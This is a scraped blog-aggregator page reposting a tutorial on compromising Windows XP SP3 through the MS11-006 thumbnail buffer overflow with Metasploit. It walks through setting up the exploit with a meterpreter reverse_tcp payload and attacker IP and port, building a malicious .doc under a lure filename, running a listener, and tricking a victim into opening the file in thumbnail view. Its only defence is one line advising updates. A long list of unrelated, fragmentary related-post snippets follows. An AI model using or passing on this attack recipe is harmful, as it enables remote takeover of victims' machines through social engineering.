feier7501
feier7501

Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability

Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP3

Attacker O.S : Backtrack 5 R1

Why create a tutorial about hacking Windows XP??now is the Windows 7 era so it’s better to write down about hacking the Windows 7 than Windows XP. If you’ve think like what I’m describe before, then you’re wrong(but not absolutely 100% wrong). According to this website and this website, Windows XP user were still dominated in this world. There’s a lot of people who’s uncomfortable when they are migrating into new Operating System, so that’s why they still stand in their old O.S.

In this tutorial we will learn how to attack Windows XP SP 3 using MS11-006 vulnerability provided by Metasploit. According toMetasploit website :

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

In other words, this type of attack would not work successfully if the user didn’t view the malicious file in “Thumbnail” view.

Let’s start the preparation and step by step. . .

Requirement :

1. Metasploit framework

Step by Step :

1. Open your terminal and go to metasploit console by typing msfconsole command, and then load the ms11-006exploit also with the payload. Below is my configuration picture :

use exploit/windows/fileformat/ms11_006_createsizeddibsection

set payload windows/meterpreter/reverse_tcp

2. To view the available switch for this exploit and payload, type show options command. In the picture below I’m just write the needed switch to configured to generate the malicious doc file.

Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability_第1张图片

Information :

set filename windows7-serial.doc --> social engineering filename to make victim
curious to open this malicious file

set outputpath /root/Desktop --> put the generated malicious file to our
Backtrack 5 R1 desktop

set lhost 192.168.8.92 --> attacker IP address / our IP address

set lport 443 --> what port you want the victim connect to your PC? Use familiar
port that usually allowed by firewall

exploit --> generate the malicious file

The default location if you didnt set up the outputpath switch was inside /root/.msf4/data/exploits/ folder, but if you set up the outputpath like mine in above picture it should be on /root/Desktop/.

3. The next step we need to set up a listener to handle reverse connection sent by victim when the exploitsuccessfully executed.

Information :

use exploit/multi/handler --> use metasploit handler to listen for any connection

set payload windows/meterpreter/reverse_tcp --> should same with the one when you set up
the malicious file above

set lhost 192.168.8.92 --> your local IP

set lport 443 --> port should same with the one when you set up the malicious file above

exploit --> start listening

4. Yep everything was set up so nice until this step, the next step you need to send your malicious file and make sure the victim open it in thumbnail view mode. Maybe you can send compressed file with a bunch of picture with your malicious file inside it.

When the victim view our malicious file in Thumbnail mode :

Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability_第2张图片

5. Our listener got something and it’s already inside the victim computer…

Pwned!

Countermeasures :

1. Always update your Operating System

Hope you enjoyed 


你可能感兴趣的:(Hacking Windows XP SP3 Via MS11-006 Windows Shell Graphics Processing Vulnerability)

  • 常见ADB命令 青衫旧故 androidadb
    //查看堆栈adbshelldumpsysactivityactivities//设备rootroot//su权限adb-dshellsu//返回adbshellinputkeyeventBACK//首页adbshellinputkeyeventHOME//输入文本adbshellinputtext'xxx'//重载adbremountadbshellpmclear包名pmpath包名//重启ad
  • 搜索引擎原理详解 风不归Alkaid 搜索引擎搜索引擎
    搜索引擎是一种复杂的软件系统,旨在帮助用户找到互联网上的信息。它们通过索引大量网页并快速响应用户查询来工作。搜索引擎的核心功能包括爬虫(crawling)、索引(indexing)、查询处理(queryprocessing)和排名(ranking)。一、网络爬虫(WebCrawling)网络爬虫(WebCrawling)是搜索引擎的核心组件之一,它的主要任务是发现和获取互联网上的网页内容,以便后续
  • vscode的终端PowerShell为什么运行不了 ,解决! 奇纳尼 vscodenode
    1:右击vscode图标,找到属性,找到兼容性一栏,勾选上以管理员身份运行此程序就可以了。重新在vscode的终端运行node-v命令就可可以了
  • app手机抓包工具 奇纳尼 抓包https网络协议http
    fiddler和charles两个抓包的区别:基本也就是试用的平台有差异Fiddler和Charles的功能大同小异,基本上都是抓包、断点调试、请求替换、构造请求、代理功能;主要区别:Fiddler只能运行在Windows平台,而Charles是基于Java实现的,基本上可以运行在所有主流的桌面系统,还有一个区别就是Fiddler开源免费、Charles是收费的;fiddler的安装步骤:fidd
  • zTasker让Windows任务自动化变得简单,小巧身躯,强大功能,让电脑操作更智能。 IT技术视界 #小坦科技自动化运维
    zTasker是一款专为Windows系统设计的自动化任务工具,以其轻量级和强大功能获得用户青睐。它能够通过多种触发条件,如定时、系统状态、文件夹变更等,来自动执行指定的任务或程序。zTasker支持超过100种任务类型,包括但不限于提醒、关机、文件备份、音量调节等,满足用户多样化的自动化需求。软件下载链接:zTasker:你的个人自动化任务助手,释放生产力!软件功能介绍定时/计划触发:支持从秒到
  • VScode是什麽? 白总Server vscodeide编辑器tcp/ipudp网络协议数据库
    VisualStudioCode(简称VSCode)是由微软开发的一款免费、开源的代码编辑器。它支持多种编程语言的开发,并且具有丰富的扩展库,使其成为开发者喜爱的集成开发环境(IDE)之一。以下是VSCode的一些关键特点和功能:关键特点轻量级且跨平台:VSCode可以在Windows、macOS和Linux操作系统上运行,且启动速度快,资源占用少。丰富的扩展市场:VSCode拥有一个庞大的扩展市
  • 解决uniapp视频层级太高的问题 云123321 uniappuni-app
    刷新可拖动//配置公共方法exportdefault{data(){return{videoUrl:'https://***',weixin_moveable_x:320,weixin_moveable_y:450};},computed:{videoHTML(){return``}},methods:{wx_pro_refresh(){var_this=this;},}};
  • windows环境下通过cmd设置环境变量 神木惊蛰
    cmd设置环境变量可以方便我们bat脚本的运行,但是要注意的是变量只在当前的cmd窗口有作用(局部生效),如果想要设置持久的环境变量需要我们通过两种手段进行设置:一种是直接修改注册表,另一种是通过我的电脑-〉属性-〉高级,来设置系统的环境变量。1、查看当前所有可用的环境变量:输入set即可查看。image.png2、查看某个环境变量:输入“set变量名”即可,比如想查看OS变量的值,即输入setO
  • C#的正则表达式 weixin_30553065
    C#中正则表达式的使用目前为止,许多编程语言和工具都包含对正则表达式的支持,C#也不例外,C#基础类库中包含有一个命名空间(System.Text.RegularExpressions)和一系列可以充分发挥规则表达式威力的类(Regex、Match、Group等)。那么,什么是正则表达式,怎么定义正则表达式呢?一、正则表达式基础l什么是正则表达式在编写字符串的处理程序时,经常会有查找符合某些复杂规
  • iZotope Ozone 11 Advanced:专业音频制作与母带处理的巅峰之作 平安喜乐616 音视频iZotopeOzone顶级音频后期制作软件
    iZotopeOzone11Advanced是一款专为音频工程师、制作人和音乐人设计的顶级音频后期制作软件,无论是Mac还是Windows平台,都能为用户提供无与伦比的音频处理体验。该软件集成了最先进的人工智能技术和一系列精密的音频处理工具,让音频作品的最终声音效果达到广播级甚至更高水准。智能化音频处理:Ozone11Advanced的核心优势在于其智能化的音频处理技术。通过AIMasterAss
  • C#入门篇5 代码不会敲! 开发语言c#入门
    目录一、常量二、枚举1、枚举类型和int以及string类型之间的转换2、注意事项强制转换(ExplicitCasting):Enum.Parse和Enum.TryParse:三、结构定义方式:结构体使用struct关键字进行定义。结构体通常用于表示小型、轻量级的数据类型值类型:结构体是值类型,这意味着它们在赋值或传递时会被复制。每个结构体的实例都具有独立的值四、一维数组1、语法:五、方法(函数)
  • Advanced SystemCare 17 Pro:全方位提升你的PC性能与安全 dntktop 软件运维
    作为一名IT从业者,我深知电脑性能与安全的重要性。今天,电脑天空要向大家推荐一款功能强大的系统优化软件——AdvancedSystemCare17Pro。这款软件集成了多项先进技术,一键式操作让你轻松提升PC性能。它不仅能够深度清理Windows注册表,释放系统资源,还能自动在线反浏览器跟踪,保护你的隐私不受侵犯。更值得一提的是,AdvancedSystemCare17Pro内置了智能磁盘碎片整理
  • 实现自定义拖动客服按钮 鹤鸣的日常 javascript前端开发语言
    import{ref}from'vue';exportdefault{setup(){consttop=ref(20);//初始位置的上边距constleft=ref(20);//初始位置的左边距letisDragging=false;lettouchStartX=0;lettouchStartY=0;conststartDrag=(event)=>{isDragging=true;constto
  • Is breakfast important? 俗世尘沙
    Breakfastdoesn'thavemuchtodowithweightloss早餐与减重并没有太大关系Breakfasthaslongbeenhailedasthemostimportantmealoftheday,andovertime,itspurportedbenefitshaveexpandedtoincludeweightcontrol.Butitturnsouteatingbre
  • RAID磁盘阵列 一个小运维
    需要服务器硬件RAID卡•廉价冗余磁盘阵列–RedundantArraysofInexpensiveDisks–通过硬件/软件技术,将多个较小/低速的磁盘整合成一个大磁盘–阵列的价值:提升I/O效率、硬件级别的数据冗余–不同RAID级别的功能、特性各不相同image.png•RAID0,条带模式–同一个文档分散存放在不同磁盘–并行写入以提高效率–至少需要两块磁盘组成,磁盘利用率100%•RAID1
  • AI-windows下使用llama.cpp部署本地Chinese-LLaMA-Alpaca-2模型 mrbone11 AI人工智能windowsllamallama2大语言模型LLM
    文章目录Llamp.cpp环境配置Chinese-LLaMA-Alpaca-2模型介绍模型下载转换生成量化模型Anaconda环境安装运行Llamp.cpp环境配置[email protected]:ggerganov/llama.cpp.gitcdllama.cppmkdirbuildcdbuildcmake..cmake--build.--configRelease生成的文件在.\b
  • 翻译 无常 雪莱 多丽码字
    Mutability无常ByPercyByssheShelley雪莱Weareascloudsthatveilthemidnightmoon;你我似,夜正央时遮月云Howrestlesslytheyspeed,andgleam,andquiver,疾驰耀闪又颤栗,Streakingthedarknessradiantly!煜煜清辉掩黑暗—yetsoon但刹那间Nightclosesround,an
  • 【js】箭头函数和普通函数在this指向的区别 罗橙7号 javascript前端开发语言
    在JavaScript中,箭头函数(ArrowFunctions)和普通函数(FunctionDeclarations/Expressions)在this的指向上有显著的不同:普通函数:函数定义时:this的值在函数被调用时才会确定,它取决于函数是如何被调用的。独立调用:如果函数是直接调用的(而不是作为对象的方法),在非严格模式下this指向全局对象(在浏览器中通常是window),在严格模式下t
  • uniapp 小程序微信登录 害的人 vue小程序
    啥也不说先上效果图html代码申请获取以下权限获得你的公开信息(昵称,头像、地区等){{loginInfo.openid!=""&&loginInfo.openid!=undefined?"已授权":"小程序授权"}}js代码import{mapMutations}from'vuex'exportdefault{data(){return{code:"",SessionKey:'',encrypt
  • 国内网站安全测试6大步骤 红酒味蛋糕_ 网络安全
    网站安全测试目标:1.发现网络系统中存在的安全隐患和可能被入侵者利用的安全漏洞2.与黑客区别:·渗透测试是经过授权的·可控制的、非破坏性的方法3.宏观上的分类:·黑盒测试不了解目标详细信息的情况,模拟黑客攻击.·白盒测试完全了解,代码审计.·灰盒测试了解一部分东西.4.思路和细节名词解释漏洞POC验证漏洞存在的代码片段exploit利用(渗透攻击)exp(利用一个漏洞完整的程序)提权权限提升获取当
  • Shell循环语句:echo转义符和调试模式 shyuu_ linux运维服务器云计算unix
    文章目录echo转义符常用转义字符常见的转义字符调试模式echo转义符常用转义字符在使用echo命令时,-n和-e是两个常用选项:echo-n:表示不换行输出。echo-e:启用转义字符,使得转义后的内容可以正确显示。常见的转义字符在echo-e中使用以下转义字符来控制输出格式:\\b:相当于按退格键(backspace),删除前一个字符。例如,\\b\\b会删除前两个字符。\\c:在\\c之前的
  • 禁止复制u盘内文件?八个方法集锦【30秒学会!】 等风来 等缘起 数据防泄密软件网络
    U盘作为便捷的数据传输工具,虽带来便利,却也暗藏数据泄露的风险。为了保障您的数据安全,下面精心整理了八大方法,助您轻松禁止U盘内文件的复制,只需30秒,即刻掌握!1.权限管理:在Windows系统中,通过设置U盘分区的权限,限制特定用户或用户组对U盘文件的访问。如将复制、删除权限设为拒绝,即可有效防止文件被复制。2.专业软件护航:利用如安企神等专业的U盘管理软件,不仅能精细设置U盘使用权限(只读、
  • MathType7.8下载安装及激活方法,撰写毕业论文和科研文章的必备神器! FLflStudio MathType2024安装包MathType7.8MathType7.9人工智能idmmacos音视频cocoa
    在数学科研和论文中,我们经常要编辑大量的公式。MathType是一款非常好用的公式编辑器,支持Windows、Mac、Linux平台,可以与Word、WPS、PPT等软件无缝集成,是撰写毕业论文和科研文章的必备神器!今天我就带大家来学习一下如何使用MathType7.8版本。一、MathType7.8安装及激活方法MathType最新mac官方版本下载如下:https://wm.makeding.
  • 利用批处理脚本快速关闭Windows IPv6防御CVE-2024-38063漏洞攻击 半点闲 Windows技术windowsCVE-2024-38063IPv6
    利用批处理脚本快速关闭WindowsIPv6防御CVE-2024-38063漏洞攻击一、WindowsTCP/IP远程代码执行漏洞CVE-2024-38063二、简易批处理脚本关闭Windows系统中的IPv6三、安全建议作者:高玉涵时间:2024.8.1614:25博客:blog.csdn.net/cg_i环境:Windows7、Windows10、Windows11一、WindowsTCP/I
  • Windows电脑桌面云便签怎么快速修改重要事项提醒设置? 宝玉敬业
    一、打开Windows电脑桌面云便签,点击界面左侧分类标签名称可进入相应分类内容列表,找到要修改重要事项提醒设置的重要便签事项;二、在便签重要事项文字下方附件行可看到设置的提醒时间及其右侧黄色五角星状的重要图标,右键点击提醒时间或者重要图标可打开操作菜单找到“修改重要”;三、点击修改重要事项按钮,打开重要事项修改设置菜单,可从已有的三个重要事项间隔时间设置中点击选择其中一个,也可以设置为“不重要”
  • websocket 初级 m0_75101866 websocket网络协议网络
    -npminstallwebsocket-App.vue//App.vueWebSocket已连接WebSocket未连接发送消息{{receivedMessage}}importtestMefrom"./components/testMe";importWebSocketServicefrom'./websocket';exportdefault{name:'App',data(){return
  • iMazing2024macOS和Win平台非常出色的第三方iOS设备管理软件 FLflStudio CleanMyMacX2024TuxeraNTFSMac2024macosios
    iMazing3,是macOS和Windows平台非常出色的第三方iOS设备管理软件。在最新版本中,新增了一些功能,比如自动备份、Wi-Fi无线备份、铃声导入导出、App管理等。iMazing3支持对iPhone、iPad、iPodTouch等设备进行数据备份与恢复,并且支持对已备份的数据进行浏览和管理,比如可以单独导出照片或通讯录。iMazing3的Wi-Fi无线备份功能非常实用。只要第一次使用
  • java -jar 后台_【Java】部署jar包并后台运行 简单的艾伦 java-jar后台
    #Linux环境部署:#1、执行jar包的命令和在windows操作系统上是一样java-jarjarName-0.0.1-SNAPSHOT.jar;注:关闭服务器连接时会关闭此程序进程,(推荐测试可用)2、将jar程序设置成后台运行,并且将标准输出的日志重定向至文件msg.lognohupjava-jarjarName-0.0.1-SNAPSHOT.jar>msg.log2>&1&;注:nohu
  • Linux期末考试复习题及linux常见题型 Whappy001 linux
    1.Linux一般有3个主要部分:内核(kernel)、命令解释层(Shell或其他操作环境)、实用工具。2.Linux的版本分为内核版本和发行版本两种。3.Linux默认的系统管理员账号是root4.Linux最早是由计算机爱好者LinusTorvalds开发的。5.单用户不是Linux的特点。6.Linux的根分区系统类型可以设置成ext47.简述Linux的体系结构。(1.Linux内核内核
  • 【转】Vue.js使用Blob的方式实现excel表格的下载(流文件下载) Bior
    导出Excelimportapifrom"../../api/api.js";importaxiosfrom"axios";exportdefault{data(){return{pageSize:30,}},created(){},computed:{},mounted(){},methods:{downloadUrl(){//console.log(api.serverUrl);letpara
  • Java 并发包之线程池和原子计数 lijingyao8206 Java计数ThreadPool并发包java线程池
    对于大数据量关联的业务处理逻辑,比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式,并且可以提高线程利用率,并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。     这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
  • java编程思想 抽象类和接口 百合不是茶 java抽象类接口
    接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持   1 ,抽象类 :  如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错)   抽象方法 : 在方法中仅有声明而没有方法体    package com.wj.Interface;
  • [房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
           随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间...        所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产     &nb
  • 数组队列总结 沐刃青蛟 数组队列
          数组队列是一种大小可以改变,类型没有定死的类似数组的工具。不过与数组相比,它更具有灵活性。因为它不但不用担心越界问题,而且因为泛型(类似c++中模板的东西)的存在而支持各种类型。      以下是数组队列的功能实现代码:   import List.Student; public class
  • Oracle存储过程无法编译的解决方法 IT独行者 oracle存储过程 
    今天同事修改Oracle存储过程又导致2个过程无法被编译,流程规范上的东西,Dave 这里不多说,看看怎么解决问题。   1.     查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
  • 重装系统之后oracle恢复 文强chu oracle
    前几天正在使用电脑,没有暂停oracle的各种服务。 突然win8.1系统奔溃,无法修复,开机时系统 提示正在搜集错误信息,然后再开机,再提示的无限循环中。 无耐我拿出系统u盘 准备重装系统,没想到竟然无法从u盘引导成功。 晚上到外面早了一家修电脑店,让人家给装了个系统,并且那哥们在我没反应过来的时候, 直接把我的c盘给格式化了 并且清理了注册表,再装系统。 然后的结果就是我的oracl
  • python学习二( 一些基础语法) 小桔子 pthon基础语法
    紧接着把!昨天没看继续看django 官方教程,学了下python的基本语法 与c类语言还是有些小差别: 1.ptyhon的源文件以UTF-8编码格式 2. /   除 结果浮点型 //  除 结果整形 %   除 取余数 *   乘 **  乘方 eg 5**2 结果是5的2次方25 _&
  • svn 常用命令 aichenglong SVN版本回退
    1 svn回退版本   1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别:   revert this version:表示回退到当前版本(该版本后的版本全部作废)   revert chanages from this versio
  • 某小公司面试归来 alafqq 面试
    先填单子,还要写笔试题,我以时间为急,拒绝了它。。时间宝贵。 老拿这些对付毕业生的东东来吓唬我。。 面试官很刁难,问了几个问题,记录下; 1,包的范围。。。public,private,protect. --悲剧了 2,hashcode方法和equals方法的区别。谁覆盖谁.结果,他说我说反了。 3,最恶心的一道题,抽象类继承抽象类吗?(察,一般它都是被继承的啊) 4,stru
  • 动态数组的存储速度比较 集合框架 百合不是茶 集合框架
    集合框架: 自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
  • 用JS实现一个JS对象,对象里有两个属性一个方法 bijian1013 js对象
    <html> <head> </head> <body> 用js代码实现一个js对象,对象里有两个属性,一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
  • 探索JUnit4扩展:使用Rule bijian1013 java单元测试JUnitRule
            在上一篇文章中,讨论了使用Runner扩展JUnit4的方式,即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule       &n
  • [Gson一]非泛型POJO对象的反序列化 bit1129 POJO
    当要将JSON数据串反序列化自身为非泛型的POJO时,使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种: 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段,例如泛型集合或者泛型类 Data类 a.不是泛型类, b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO    
  • 【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
    0.Kafka服务器的配置 一个Broker, 一个Topic Topic中只有一个Partition()   1. Producer: package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
  • lsyncd实时同步搭建指南——取代rsync+inotify ronin47
    1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案,原先使用的是 inotify + rsync,但随着文件数量的增大到100W+,目录下的文件列表就达20M,在网络状况不佳或者限速的情况下,变更的文件可能10来个才几M,却因此要发送的文件列表就达20M,严重减低的带宽的使用效率以及同步效率;更为要紧的是,加入inotify
  • java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
    public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时,肯定是查找树 *2.只有两个结点时,肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
  • MySQL的sum函数返回的类型 bylijinnan javaspringsqlmysqljdbc
    今天项目切换数据库时,出错 访问数据库的代码大概是这样: String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
  • java设计模式之单例模式 chicony java设计模式
    在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的:   作为对象的创建模式,单例模式确保某一个类只有一个实例,而且自行实例化并向整个系统提供这个实例。这个类称为单例类。 单例模式的结构   单例模式的特点: 单例类只能有一个实例。 单例类必须自己创建自己的唯一实例。 单例类必须给所有其他对象提供这一实例。   饿汉式单例类   publ
  • javascript取当月最后一天 ctrain JavaScript
    <!--javascript取当月最后一天--> <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
  • linux tune2fs命令详解 daizj linuxtune2fs查看系统文件块信息
    一.简介: tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检,而且是可以通过tune2fs命令,自行定义自检周期及方式。 二.用法: Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
  • 做有中国特色的程序员 dcj3sjt126com 程序员
      从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有
  • Android:TextView属性大全 dcj3sjt126com textview
    android:autoLink    设置是否当文本为URL链接/email/电话号码/map时,文本显示为可点击的链接。可选值(none/web/email/phone/map/all)  android:autoText    如果设置,将自动执行输入值的拼写纠正。此处无效果,在显示输入法并输
  • tomcat虚拟目录安装及其配置 eksliang tomcat配置说明tomca部署web应用tomcat虚拟目录安装
    转载请出自出处:http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat  目录结构 config:存放tomcat的配置文件 temp  :存放tomcat跑起来后存放临时文件用的 work   : 当第一次访问应用中的jsp
  • 浅谈:APP有哪些常被黑客利用的安全漏洞 gg163 APP
    首先,说到APP的安全漏洞,身为程序猿的大家应该不陌生;如果抛开安卓自身开源的问题的话,其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上,有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测(ineice.com)的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞:APK 包非常容易被反编译成可读
  • C#根据网址生成静态页面 hvt Web.netC#asp.nethovertree
    HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页,以及显示用户名,退出等功能。根据网址生成页面的方法:   bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
  • SVG 教程 (一) 天梯梦 svg
    SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。 学习之前应具备的基础知识: 继续学习之前,你应该对以下内容有基本的了解: HTML XML 基础 如果希望首先学习这些内容,请在本站的首页选择相应的教程。 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
  • 一个简单的java栈 luyulong java数据结构
    public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
  • 基础数据结构和算法八:Binary search sunwinner AlgorithmBinary search
    Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
  • 12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 刘星宇 c面试
    12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 1.gets()函数 问:请找出下面代码里的问题: #include<stdio.h> int main(void) {     char buff[10];     memset(buff,0,sizeof(buff));
  • ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员 活动ITeye试读
    ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾: http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《Java性能优化权威指南》
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他